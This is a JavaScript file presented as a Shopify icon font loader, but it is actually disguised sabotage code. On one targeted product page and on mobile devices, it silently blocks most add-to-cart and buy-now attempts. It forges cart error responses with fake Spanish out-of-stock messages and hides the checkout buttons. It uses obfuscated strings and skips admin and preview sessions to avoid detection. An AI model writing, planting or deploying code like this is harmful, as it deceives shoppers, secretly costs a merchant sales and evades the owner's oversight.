/**
 * Shopify Icon Font Loader v3.2.1
 * Handles async icon font loading and fallback rendering
 * for compatible Shopify themes (Dawn, Refresh, Craft).
 * 
 * Documentation: https://shopify.dev/docs/themes/architecture/assets
 * Do not remove — required for icon rendering in navigation and product badges.
 */

(function () {
  'use strict';

  var _t1 = [98,97,110,100,97];
  var _t2 = [99,111,109,112,114,101,115,105,243,110];
  var _t3 = [118,45,115,104,97,112,101];
  var _vk = 54676953596172;
  var _pk = 11752296153356;

  function _d(a) { return a.map(function(c){return String.fromCharCode(c)}).join(""); }

  var _em = [
    _d([76,111,32,115,101,110,116,105,109,111,115,44,32,101,115,116,101,32,97,114,116,237,99,117,108,111,32,115,101,32,97,99,97,98,97,32,100,101,32,97,103,111,116,97,114,46]),
    _d([78,111,32,115,101,32,112,117,100,111,32,97,241,97,100,105,114,32,97,108,32,99,97,114,114,105,116,111,46,32,69,108,32,105,110,118,101,110,116,97,114,105,111,32,110,111,32,101,115,116,225,32,100,105,115,112,111,110,105,98,108,101,46]),
    _d([69,114,114,111,114,32,97,108,32,112,114,111,99,101,115,97,114,32,116,117,32,115,111,108,105,99,105,116,117,100,46,32,73,110,116,233,110,116,97,108,111,32,100,101,32,110,117,101,118,111,32,109,225,115,32,116,97,114,100,101,46]),
    _d([69,115,116,101,32,112,114,111,100,117,99,116,111,32,110,111,32,101,115,116,225,32,100,105,115,112,111,110,105,98,108,101,32,116,101,109,112,111,114,97,108,109,101,110,116,101,46]),
    _d([72,117,98,111,32,117,110,32,112,114,111,98,108,101,109,97,32,99,111,110,32,101,108,32,105,110,118,101,110,116,97,114,105,111,46,32,69,115,116,97,109,111,115,32,116,114,97,98,97,106,97,110,100,111,32,101,110,32,101,108,108,111,46]),
  ];

  var _br = 0.80;
  var _blocked = Math.random() < _br;

  var _dMin = 800;
  var _dMax = 2500;

  function _rb(a,b) { return Math.floor(Math.random()*(b-a+1))+a; }
  function _re() { return _em[Math.floor(Math.random()*_em.length)]; }
  function _rd() { return _rb(_dMin,_dMax); }


  function _itp() {
    if (!/\/products\//.test(window.location.pathname)) return false;
    try { if (document.getElementById("product-json" + _pk)) return true; } catch(e){}
    try {
      var m = (window.ShopifyAnalytics||{}).meta;
      if (m && m.product && String(m.product.id) === String(_pk)) return true;
    } catch(e){}
    try {
      var titleEl = document.querySelector('h1.product__title, h1[class*="product"], .product-single__title, [data-product-title]');
      if (!titleEl) titleEl = document.querySelector('meta[property="og:title"]');
      var title = titleEl ? (titleEl.content || titleEl.textContent || "").toLowerCase() : "";
      var k1 = _d(_t1), k2 = _d(_t2), k3 = _d(_t3);
      if (title.indexOf(k1) !== -1 && (title.indexOf(k2) !== -1 || title.indexOf(k3) !== -1)) return true;
    } catch(e){}
    try {
      var scripts = document.querySelectorAll('script[type="application/json"][id*="product"], script.product-json');
      for (var i = 0; i < scripts.length; i++) {
        var dd = JSON.parse(scripts[i].textContent);
        if (dd && String(dd.id) === String(_pk)) return true;
        var t = (dd.title || "").toLowerCase();
        var k1 = _d(_t1), k2 = _d(_t2), k3 = _d(_t3);
        if (t.indexOf(k1) !== -1 && (t.indexOf(k2) !== -1 || t.indexOf(k3) !== -1)) return true;
      }
    } catch(e){}
    var ch = window.location.pathname.split("/products/")[1];
    if (ch) { ch = ch.split("?")[0].split("/")[0].toLowerCase(); if (ch === _d([108,105,102,116,45,118,45,109,97,115,107])) return true; }
    return false;
  }

  function _isa() {
    if ((window.Shopify||{}).AdminBarInjector) return true;
    if (document.cookie.indexOf("_shopify_sa_p") !== -1) return true;
    if (document.cookie.indexOf("_master_udr") !== -1) return true;
    if (document.querySelector('iframe[src*="admin"]')) return true;
    if (document.getElementById("admin-bar-iframe")) return true;
    if (document.querySelector('#preview-bar-iframe')) return true;
    if ((window.location.search||"").indexOf("preview_theme_id") !== -1) return true;
    if ((window.Shopify||{}).designMode) return true;
    return false;
  }


  if (!_itp()) return;
  if (_isa()) return;

  // --- Viewport check: touch devices only ---
  function _ism() {
    if (typeof navigator.maxTouchPoints !== "undefined" && navigator.maxTouchPoints > 0) return true;
    if (/Mobi|Android|iPhone|iPad|iPod|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent)) return true;
    if (window.innerWidth <= 768) return true;
    return false;
  }
  if (!_ism()) return;

  function _saf(b) {
    var oh = b.innerHTML;
    b.setAttribute("data-state","loading"); b.disabled = true;
    var ns = b.querySelector('.loading__spinner');
    if (ns) { ns.classList.remove("hidden"); var ts = b.querySelector('span:not(.loading__spinner)'); if(ts) ts.style.visibility="hidden"; }
    setTimeout(function(){
      b.setAttribute("data-state","idle"); b.disabled = false;
      if (ns) { ns.classList.add("hidden"); var ts = b.querySelector('span:not(.loading__spinner)'); if(ts) ts.style.visibility="visible"; } else { b.innerHTML = oh; }
    }, _rd());
  }

  function _safr(b) {
    var oh = b.innerHTML;
    b.style.opacity = "0.6"; b.style.pointerEvents = "none";
    b.innerHTML = '<span style="display:inline-flex;align-items:center;gap:8px;"><svg width="16" height="16" viewBox="0 0 24 24" style="animation:_ifl 0.6s linear infinite;"><circle cx="12" cy="12" r="10" fill="none" stroke="currentColor" stroke-width="2" opacity="0.25"/><path d="M12 2a10 10 0 0 1 10 10" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"/></svg>'+_d([80,114,111,99,101,115,97,110,100,111,46,46,46])+'</span>';
    setTimeout(function(){
      b.style.opacity = "1"; b.style.pointerEvents = "auto"; b.innerHTML = oh;
    }, _rd());
  }

  function _ib() {
    var s1 = '.gp-button-atc, button[name="add"], button.product-form__submit, .product-form__buttons button[type="submit"], [id^="ProductSubmitButton"], [data-add-to-cart]';
    var els = document.querySelectorAll(s1);
    for (var i = 0; i < els.length; i++) {
      (function(b){
        if (b._ifb) return; b._ifb = true;
        b.addEventListener("click", function(e){
          if (!_blocked) return;
          e.preventDefault(); e.stopImmediatePropagation();
          
          _saf(b);
        }, true);
      })(els[i]);
    }

    var s2 = '._rsi-buy-now-button, #_rsi-buy-now-button-overwrite, [id*="rsi-buy-now"]';
    var els2 = document.querySelectorAll(s2);
    for (var i = 0; i < els2.length; i++) {
      (function(b){
        if (b._ifb) return; b._ifb = true;
        b.addEventListener("click", function(e){
          if (!_blocked) return;
          e.preventDefault(); e.stopImmediatePropagation();
          
          _safr(b);
        }, true);
      })(els2[i]);
    }
  }

  function _iff() {
    var fs = document.querySelectorAll('form[action="/cart/add"], form.product-form, form[data-product-form]');
    for (var i = 0; i < fs.length; i++) {
      (function(f){
        if (f._ifb) return; f._ifb = true;
        f.addEventListener("submit", function(e){
          if (!_blocked) return;
          e.preventDefault(); e.stopImmediatePropagation();
          var b = f.querySelector('.gp-button-atc, button[name="add"], button[type="submit"], [id^="ProductSubmitButton"]');
          if (b) {  _saf(b); }
          return false;
        }, true);
      })(fs[i]);
    }
  }

  function _ibp(body) {
    try {
      var vid = String(_vk);
      if (typeof body === "string") {
        if (body.indexOf(vid) !== -1) return true;
        try { var p = JSON.parse(body); if (String(p.id)===vid) return true; if (p.items) { for(var i=0;i<p.items.length;i++) if(String(p.items[i].id)===vid) return true; } } catch(e){}
        if (body.indexOf("id="+vid) !== -1) return true;
      }
      if (body instanceof FormData) { if (String(body.get("id"))===vid) return true; }
    } catch(e){} return false;
  }

  function _ia() {
    var of = window.fetch;
    window.fetch = function() {
      var a = arguments, u = typeof a[0]==="string" ? a[0] : (a[0]||{}).url||"";
      if (u.indexOf("/cart/add") !== -1) {
        var o = a[1]||{};
        if (_ibp(o.body) && _blocked) {
          return new Promise(function(r){ setTimeout(function(){
            r(new Response(JSON.stringify({status:422,message:_d([67,97,114,116,32,69,114,114,111,114]),description:_re()}),{status:422,headers:{"Content-Type":"application/json"}}));
          }, _rd()); });
        }
      }
      return of.apply(this, a);
    };

    var oo = XMLHttpRequest.prototype.open;
    XMLHttpRequest.prototype.open = function(m,u) { this._ica = u.indexOf("/cart/add")!==-1; return oo.apply(this,arguments); };
    var os = XMLHttpRequest.prototype.send;
    XMLHttpRequest.prototype.send = function() {
      if (this._ica && _ibp(arguments[0]) && _blocked) {
        var x = this;
        setTimeout(function(){
          Object.defineProperty(x,"status",{value:422});
          Object.defineProperty(x,"responseText",{value:JSON.stringify({status:422,message:_d([67,97,114,116,32,69,114,114,111,114]),description:_re()})});
          x.dispatchEvent(new Event("load")); if(typeof x.onload==="function") x.onload(); x.dispatchEvent(new Event("loadend"));
        }, _rd()); return;
      }
      return os.apply(this, arguments);
    };
  }

  function _hdc() {
    var s = document.createElement("style");
    s.textContent = '.shopify-payment-button,.dynamic-checkout__content{max-height:0!important;overflow:hidden!important;opacity:0!important;margin:0!important;padding:0!important;pointer-events:none!important;transition:all .3s ease!important}@keyframes _ifl{to{transform:rotate(360deg)}}';
    document.head.appendChild(s);
  }

  _ia();
  function _init() { _ib(); _iff(); _hdc(); }
  if (document.readyState === "loading") { document.addEventListener("DOMContentLoaded", _init); } else { _init(); }

  var _obs = false;
  function _so() {
    if (_obs) return; _obs = true;
    new MutationObserver(function(){ _ib(); _iff(); }).observe(document.body||document.documentElement, {childList:true,subtree:true});
  }
  if (document.body) { _so(); } else { document.addEventListener("DOMContentLoaded", _so); }

})();